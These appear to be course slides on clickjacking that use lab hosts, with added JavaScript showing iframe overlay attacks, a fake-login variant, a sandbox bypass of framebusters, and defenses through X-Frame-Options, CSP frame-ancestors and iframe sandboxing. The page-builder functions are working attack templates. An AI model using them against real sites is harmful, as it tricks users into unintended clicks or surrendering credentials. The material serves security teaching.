
Clickjacking

Attack

ClickJacking-slides Page 1
Outline

❖ Iframe and its properties


❖ Clickjacking using iframes
❖ Countermeasures (CSP)
❖ Iframe's security features

❖ Reading: will be included in the 3rd edition


❖ Lab: Under development
❖ The code used in this lecture is included in the resource

Lab Setup
Elgg website: www.seed-server.com

Attacker: www.attacker32.com

Defense: www.bank32.com

Add the following to /etc/hosts

End

Iframe and its
Properties

Iframe: Inline Frame

Overlapping iframes
URL: http://www.attacker32.com/test1.html

Transparent iframe
URL: http://www.attacker32.com/test1.html

Features versus Security

End

Attack Using
Transparent iframe

Attack 1 Demo
URL: http://www.attacker32.com/

Attack 1: LikeJacking

Code: image_apache_server/attacker32/attack/clickjacking1.html

❖ Inside bottom1.html

Attack 2: Adding A Friend

Code: image_apache_server/attacker32/attack/clickjacking2.html

Attack 3: Deleting A Friend

Code: image_apache_server/attacker32/attack/clickjacking3.html

End

Attack Using
Small-size iframe

Attack 4 Demo
URL: http://www.attacker32.com/

Attack 4: Using Small-Size iFrame

Code: image_apache_server/attacker32/attack/clickjacking4.html

Attack 5: Fake Login

Code: image_apache_server/attacker32/attack/clickjacking5.html

❖ Inside fake_login.html
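Added example (not the lecture's clickjacking1.html to clickjacking5.html, which are in the resource): two page builders showing the CSS that the "Attack Using Transparent iframe" slides (Attacks 1 to 3) and the "Attack Using Small-size iframe" slides (Attacks 4 and 5) rely on. The hostnames are the lab's; the page size, bait position and clip region are assumptions that an attacker would measure from the real target page.

```javascript
// Added example, not code from the lecture resource. Hostnames are the lab's;
// paths, page size, bait position and clip region are assumed.

// Transparent overlay (Attacks 1-3): the victim site is loaded full-size, made
// invisible with opacity:0 and put ABOVE the decoy with a higher z-index. The
// user sees the decoy (bait button, fake text), but every click reaches the
// iframe, so the bait is positioned exactly over the target control.
function transparentOverlayPage({ targetUrl, baitLabel, baitTop, baitLeft }) {
  return `<!DOCTYPE html>
<html><head><style>
  #decoy  { position: relative; width: 1024px; height: 768px; }
  #bait   { position: absolute; top: ${baitTop}px; left: ${baitLeft}px; z-index: 1; }
  #victim { position: absolute; top: 0; left: 0; width: 1024px; height: 768px;
            border: 0; opacity: 0; z-index: 2; }   /* invisible, but on top */
</style></head>
<body>
<div id="decoy">
  <button id="bait">${baitLabel}</button>
  <iframe id="victim" src="${targetUrl}"></iframe>
</div>
</body></html>`;
}

// Small window (Attacks 4-5): the victim site stays opaque, but only a
// clip-sized piece of it shows through a div with overflow:hidden. Negative
// offsets scroll the target control (a button, or the login form for the
// fake-login variant) into that window; the attacker page supplies the
// misleading text around it.
function smallWindowPage({ targetUrl, caption, clip }) {
  const { offsetTop, offsetLeft, width, height } = clip;   // region of the victim page to expose
  return `<!DOCTYPE html>
<html><head><style>
  #window { position: relative; overflow: hidden; width: ${width}px; height: ${height}px; }
  #victim { position: absolute; top: -${offsetTop}px; left: -${offsetLeft}px;
            width: 1024px; height: 768px; border: 0; }   /* opaque, just shifted */
</style></head>
<body>
<p>${caption}</p>
<div id="window">
  <iframe id="victim" src="${targetUrl}"></iframe>
</div>
</body></html>`;
}

// Pull the CSS declaration block for one #id out of a generated page, so the
// key properties can be checked without opening a browser.
function cssFor(html, id) {
  const m = html.match(new RegExp(`#${id}\\s*\\{([^}]*)\\}`));
  return m ? m[1].replace(/\s+/g, " ").trim() : null;
}
```

Save the output of either function as a page on www.attacker32.com and load it in the lab browser; the overlay variant is defeated by any of the framing defenses covered later in the deck, which is the point of the countermeasures section.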

End

Countermeasures

Old Idea: Framekiller/Framebuster
❖ Example
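Added example, not the slide's own framebuster code: the classic framebuster plus a small harness that models why it is the "old idea". An attacker who embeds the page with `<iframe sandbox="allow-scripts allow-forms" src=...>` (no `allow-top-navigation`, one of the sandbox options covered later in the deck) makes the `top.location` assignment throw, and the page stays framed. The fake window objects are constructed for the example; in a real page the check runs at the top of `<head>` as `framebust(window)`.

```javascript
// Added example, not code from the lecture resource. fakeWindow() is a
// constructed stand-in for the browser's window object.

// Classic framebuster. In a page this is simply:
//   if (window.top !== window.self) { window.top.location = window.self.location; }
// It takes the window as a parameter here so it can run outside a browser.
function framebust(win) {
  if (win.top === win.self) return "not-framed";
  try {
    win.top.location = win.self.location;   // navigate the outer page to ourselves
    return "busted";
  } catch (e) {
    // SecurityError: the embedding iframe is sandboxed without
    // allow-top-navigation, so the attacker's overlay survives.
    return "blocked";
  }
}

// Stand-in for window objects: not framed, framed by a plain iframe, or framed
// by a sandboxed iframe whose top.location setter throws.
function fakeWindow({ framed, sandboxed }) {
  const self = { location: "http://www.bank32.com/" };
  if (!framed) return { self, top: self };
  const outer = { navigatedTo: null };
  Object.defineProperty(outer, "location", {
    set(url) {
      if (sandboxed) throw new Error("SecurityError: top navigation not allowed");
      outer.navigatedTo = url;
    },
    get() { return outer.navigatedTo; },
  });
  return { self, top: outer };
}
```

Because the bypass is entirely under the attacker's control (the sandbox attribute lives on the attacker's page), the defense has to move to the server, which is what the X-Frame-Options and CSP slides that follow do.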

X-Frame-Options Approach
❖ Options
○ X-Frame-Options: DENY
○ X-Frame-Options: SAMEORIGIN

❖ Experiment: Three Pages from bank32.com

❖ Load them into attacker32.com's iframes

❖ Load them into bank32.com's iframes

CSP (Content Security Policy) Approach
❖ Options

❖ Experiment: Three Pages from bank32.com

❖ Load them into attacker32.com's iframes

❖ Load them into bank32.com's iframes

❖ Setting CSP policy on Apache
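Added example, not the lecture's bank32.com pages or its Apache configuration: a model of the browser's framing decision for both header-based defenses (the X-Frame-Options slide and the CSP slide), run over the slides' experiment of loading bank32.com pages into an attacker32.com iframe and into a bank32.com iframe. The header syntax and the Apache `mod_headers` directives in the comments are real; the six page paths and which policy each carries are assumptions.

```javascript
// Added example, not code from the lecture resource. Page paths and their
// policies are assumed; hostnames are the lab's.
//
// On Apache (mod_headers) the policies are set per site or per <Location>:
//   Header always set X-Frame-Options "SAMEORIGIN"
//   Header always set Content-Security-Policy "frame-ancestors 'self'"

// Does one frame-ancestors source token match one ancestor document?
function ancestorMatches(token, ancestorUrl, framedUrl) {
  const anc = new URL(ancestorUrl);
  if (token === "'none'") return false;
  if (token === "'self'") return anc.origin === new URL(framedUrl).origin;
  if (token === "*") return true;
  if (/^[a-z][a-z0-9+.\-]*:$/i.test(token)) {        // scheme-source, e.g. "https:"
    return anc.protocol === token.toLowerCase();
  }
  // host-source: [scheme://]host[:port]; a "*." prefix matches subdomains.
  // Port handling is simplified to URL.host (host plus any non-default port).
  let scheme = null, hostPart = token.toLowerCase();
  const m = hostPart.match(/^([a-z][a-z0-9+.\-]*):\/\/(.+)$/);
  if (m) { scheme = m[1] + ":"; hostPart = m[2]; }
  if (scheme && anc.protocol !== scheme) return false;
  if (hostPart.startsWith("*.")) return anc.hostname.endsWith(hostPart.slice(1));
  return anc.host === hostPart;
}

// CSP: every ancestor in the chain, not only the top window, must match some
// source in the list.
function frameAncestorsAllow(sourceList, framedUrl, ancestorUrls) {
  const tokens = sourceList.trim().split(/\s+/);
  return ancestorUrls.every(anc => tokens.some(t => ancestorMatches(t, anc, framedUrl)));
}

// X-Frame-Options: DENY; SAMEORIGIN (checked against every ancestor in current
// browsers, only the top window in older ones); any other value, including the
// obsolete ALLOW-FROM, is ignored.
function xfoAllows(value, framedUrl, ancestorUrls) {
  const self = new URL(framedUrl).origin;
  switch (value.trim().toUpperCase()) {
    case "DENY":       return false;
    case "SAMEORIGIN": return ancestorUrls.every(a => new URL(a).origin === self);
    default:           return true;
  }
}

// Browser decision: a CSP with frame-ancestors wins and X-Frame-Options is
// ignored; otherwise X-Frame-Options applies; with neither, framing is allowed.
function mayFrame(headers, framedUrl, ancestorUrls) {
  const csp = headers["content-security-policy"] || "";
  const fa = csp.split(";").map(d => d.trim())
    .find(d => d.toLowerCase().startsWith("frame-ancestors"));
  if (fa) return frameAncestorsAllow(fa.slice("frame-ancestors".length), framedUrl, ancestorUrls);
  if (headers["x-frame-options"]) return xfoAllows(headers["x-frame-options"], framedUrl, ancestorUrls);
  return true;
}

// Assumed policies for the experiment pages on bank32.com.
const PAGES = {
  "http://www.bank32.com/none.html":       {},
  "http://www.bank32.com/deny.html":       { "x-frame-options": "DENY" },
  "http://www.bank32.com/sameorigin.html": { "x-frame-options": "SAMEORIGIN" },
  "http://www.bank32.com/csp-none.html":   { "content-security-policy": "frame-ancestors 'none'" },
  "http://www.bank32.com/csp-self.html":   { "content-security-policy": "frame-ancestors 'self'" },
  "http://www.bank32.com/csp-list.html":   { "content-security-policy": "frame-ancestors 'self' http://www.seed-server.com" },
};

// Load every page into an iframe on embedderUrl; returns { pageUrl: allowed }.
function runExperiment(embedderUrl) {
  const out = {};
  for (const [url, headers] of Object.entries(PAGES)) {
    out[url] = mayFrame(headers, url, [embedderUrl]);
  }
  return out;
}
```

The practical difference between the two headers is the last page: X-Frame-Options has no usable allow-list (ALLOW-FROM was never supported across browsers), while `frame-ancestors` can name partner origins and still refuse attacker32.com. Note that neither header does anything unless the server actually sends it on the page being framed; check with `curl -I` rather than trusting the configuration file.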

End

Security Features
of iframe

Same-Origin Policy of Iframe
❖ Iframes

❖ Parent Accessing Child

❖ Child Accessing Parent

❖ Child Accessing Siblings

Experiment Design

Using Iframe to Sandbox Content
❖ Setting Sandbox

❖ Options
○ allow-same-origin
○ allow-scripts
○ allow-forms
○ allow-modals
○ allow-top-navigation

Sandboxing Dynamic Content
❖ Setting Sandbox
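Added example, not from the lecture: a model of what the browser allows between a parent page and its iframes under the same-origin policy (the "Same-Origin Policy of Iframe" slide: parent to child, child to parent, child to siblings), and how the sandbox attribute changes that, including the srcdoc case from "Sandboxing Dynamic Content". The sandbox tokens are the real attribute values; the hosts are the lab's and the paths are assumed.

```javascript
// Added example, not code from the lecture resource. Hosts are the lab's,
// paths are assumed.

// frame.sandbox: null = no sandbox attribute; [] = sandbox="" (every
// restriction on); otherwise the list of allow-* tokens. frame.url may be
// "about:srcdoc" for content injected through the srcdoc attribute.
function frameCapabilities(parentUrl, frame) {
  const { url, sandbox } = frame;
  const sandboxed = sandbox !== null;
  const has = t => sandboxed && sandbox.includes(t);
  const parentOrigin = new URL(parentUrl).origin;

  let origin;
  if (sandboxed && !has("allow-same-origin")) origin = null;  // unique opaque origin
  else if (url === "about:srcdoc") origin = parentOrigin;     // srcdoc inherits the embedder's origin
  else origin = new URL(url).origin;

  const sameOrigin = origin !== null && origin === parentOrigin;
  const scripts = !sandboxed || has("allow-scripts");
  return {
    origin,
    scriptsRun: scripts,
    formsSubmit: !sandboxed || has("allow-forms"),
    modalsAllowed: !sandboxed || has("allow-modals"),        // alert(), confirm(), prompt()
    canNavigateTop: !sandboxed || has("allow-top-navigation"), // otherwise top.location = ... throws
    parentCanReadChildDom: sameOrigin,              // iframe.contentDocument is null cross-origin
    childCanReadParentDom: sameOrigin && scripts,   // window.parent.document
    // allow-scripts together with allow-same-origin lets same-origin content
    // remove the sandbox attribute from its own <iframe> element, so that pair
    // gives untrusted content no real containment.
    canEscapeSandbox: sandboxed && has("allow-scripts") && has("allow-same-origin") && sameOrigin,
  };
}

// Two children of the same parent can touch each other's DOM (via
// parent.frames[i].document) only when both have a real, equal origin; two
// opaque origins are never equal, even for identical URLs.
function siblingsCanAccess(parentUrl, a, b) {
  const oa = frameCapabilities(parentUrl, a).origin;
  const ob = frameCapabilities(parentUrl, b).origin;
  return oa !== null && oa === ob;
}
```

The srcdoc case is the one that matters for dynamic content: without a sandbox attribute, user-supplied HTML placed in `srcdoc` runs with the host page's own origin, so `sandbox="allow-scripts"` (and not `allow-same-origin`) is what actually isolates it.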

End

Summary

Summary
❖ Iframe, its attributes and security features

❖ Clickjacking attacks

❖ Countermeasures

End
